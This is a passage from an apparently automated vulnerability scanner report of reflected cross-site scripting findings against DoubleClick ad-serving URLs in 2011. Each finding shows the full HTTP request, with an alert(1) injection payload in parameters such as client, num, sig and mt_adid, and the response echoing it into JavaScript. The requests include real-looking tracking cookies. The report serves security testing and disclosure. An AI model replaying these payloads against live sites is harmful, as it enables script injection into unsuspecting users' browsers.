GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ5f06e"-alert(1)-"09b49dad07e&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 13:42:41 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:42:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37325

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
AM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ5f06e"-alert(1)-"09b49dad07e&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_129562
...[SNIP]...

1.22. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a165'-alert(1)-'2d07bc92719 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-23328560728380682a165'-alert(1)-'2d07bc92719&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 13:44:37 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:44:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37325

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-23328560728380682a165'-alert(1)-'2d07bc92719&adurl=http://www.chevrolet.com/volt/">
...[SNIP]...

1.23. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 359eb"-alert(1)-"b60e22ca605 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068359eb"-alert(1)-"b60e22ca605&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 13:44:33 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:44:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37325

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068359eb"-alert(1)-"b60e22ca605&adurl=";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1295621212205.uniqueId;
this.thirdPartyImpUrl = "";

...[SNIP]...

1.24. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [dcove parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0712"-alert(1)-"dd014beff89 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=Lf0712"-alert(1)-"dd014beff89&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 13:42:28 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:42:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37329

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
%3B0-0%3B0%3B59328126%3B4307-300/250%3B40371833/40389620/1%3B%3B%7Efdr%3D235464149%3B0-0%3B0%3B59327774%3B4307-300/250%3B40420811/40438598/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Lf0712"-alert(1)-"dd014beff89&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkx
...[SNIP]...

1.25. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [dcove parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0edd'-alert(1)-'a01073893a4 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=Lb0edd'-alert(1)-'a01073893a4&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 13:42:32 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:42:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37325

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
%3B1-0%3B0%3B59328126%3B4307-300/250%3B40371835/40389622/1%3B%3B%7Efdr%3D235464149%3B0-0%3B0%3B59327774%3B4307-300/250%3B40420811/40438598/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Lb0edd'-alert(1)-'a01073893a4&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkx
...[SNIP]...

1.26. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19989"-alert(1)-"7118af966ff was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=119989"-alert(1)-"7118af966ff&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 13:43:04 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:43:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37329

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
JBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=119989"-alert(1)-"7118af966ff&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_129562120793
...[SNIP]...

1.27. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60dd1'-alert(1)-'404a3906255 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=160dd1'-alert(1)-'404a3906255&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 13:43:09 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:43:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37329

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
JBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=160dd1'-alert(1)-'404a3906255&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=http://www.chevrolet.com/volt/">
...[SNIP]...

1.28. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1182"-alert(1)-"25545647696 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1ga1182"-alert(1)-"25545647696&client=ca-pub-2332856072838068&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 13:43:49 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:43:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37325

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
PIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1ga1182"-alert(1)-"25545647696&client=ca-pub-2332856072838068&adurl=";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1295621212205.uniqueId;
this.thirdP
...[SNIP]...

1.29. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48d13'-alert(1)-'0a8af2960d9 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g48d13'-alert(1)-'0a8af2960d9&client=ca-pub-2332856072838068&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 13:43:54 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:43:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37329

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
PIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g48d13'-alert(1)-'0a8af2960d9&client=ca-pub-2332856072838068&adurl=http://www.chevrolet.com/volt/">
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.39 [mt_adid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.39

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0b78'-alert(1)-'93ac811f06d was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.39;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=62143273837836637&mt_id=111040&mt_adid=70e0b78'-alert(1)-'93ac811f06d&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=62143273837836637? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MjE0MzI3MzgzNzgzNjYzNy8xMTEwNDAvMTAyMDY1LzMvUWk0TlZFWk5SbHYyNzBhYklEZU9pd3Nzb1g4SlNGczg1RjlCN293LWNUay8/InA55NeIGGV4hzZENaajIegtkxo&price=3.757000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:40:25 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:40:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/c/a6/%2a/y;235638469;0-0;0;59396963;4307-300/250;40463876/40481663/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=62143273837836637&mt_id=111040&mt_adid=70e0b78'-alert(1)-'93ac811f06d&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.39 [mt_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
